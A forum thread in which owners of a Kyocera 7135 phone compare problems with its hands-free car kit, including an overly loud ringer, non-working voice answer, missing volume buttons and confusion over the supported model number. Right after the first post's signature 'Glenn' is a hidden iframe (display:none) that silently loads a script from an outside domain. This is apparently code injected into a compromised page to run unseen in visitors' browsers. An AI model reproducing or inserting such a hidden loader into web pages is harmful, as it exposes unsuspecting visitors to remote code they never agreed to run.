+ Reply to Thread

Hands free kit -- too loud...

Folks,

I had the hands free car kit with the 6035 -- it worked but was hard to hear. But it had a nice volume control on the side and charged the phone quickly.

I retired my 6035 and finally bought the 7135 hands free kit.

Maybe I am doing something wrong or have a defective unit, but here’s what I have found.

1) The new hands free kit is too loud in all cases. The ringer gives me a panic attack and the voice level when set to the lowest level on the 7135 is WAY TOO LOUD!

2) Voice answer, which worked fine with the 6035 does not work with the 7135. I’ve checked all the settings, and the phone just rings too loud. The 6035 said “Incoming call -- answer?” This feature does not seem to work on the 7135 – it just ring really load. I have turned on the voice answer feature.

3) The volume control and privacy buttons are not there on the 7135 hands free kit. I liked and used both of these.

Am I missing something here? This hands free kit is unusable and worse than the 6035 one. Someone help me out. I must have some settings wrong…

Glenn<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

full volume control with coolcat's adaptors.

do a search for mp3 adaptor

or my post for

"top of the line car speaker system for 35 dollars" in off topic

I have been going back and forth with Kyocera for a while about how loud the ringer is for the hands free kit. I bought mine through Verizon. After a while, they said that I probably have the wrong model. I returned it, and ordered the one from Dan's Cell Phones. The one from Dan is the model number that Kyocera says is supported, but different than the one that Verizon sold me. I am hoping that the problem will be corrected with that model (I haven't received it yet), but I spoke to someone else who has the correct model and he seems to have the same problem. I will get in touch with Kyocera again if I have the problem when I get the kit in the mail. Looks like they have to escalate the problem since it seems like it isn't just me. I will post an update if they ever figure out the problem.

-Mike

I have the Kyo hands free kit and it works fine. Volume can be controlled through the side buttons on the phone and it tellls me of an incoming call by "Incoming call--Answer?" as long as I have the 7135 set to voice answer. The only issue I have is that it is tricky to record your voice dialing names so they work with both the hands free kit and when used with directly with the phone. But with a little effort and retraining I've gotten it to work.

Originally posted by Lnoble
    I have the Kyo hands free kit and it works fine. Volume can be controlled through the side buttons on the phone and it tellls me of an incoming call by "Incoming call--Answer?" as long as I have the 7135 set to voice answer. The only issue I have is that it is tricky to record your voice dialing names so they work with both the hands free kit and when used with directly with the phone. But with a little effort and retraining I've gotten it to work.
    What is the model number of your hands free kit?

Thanks,
    Mike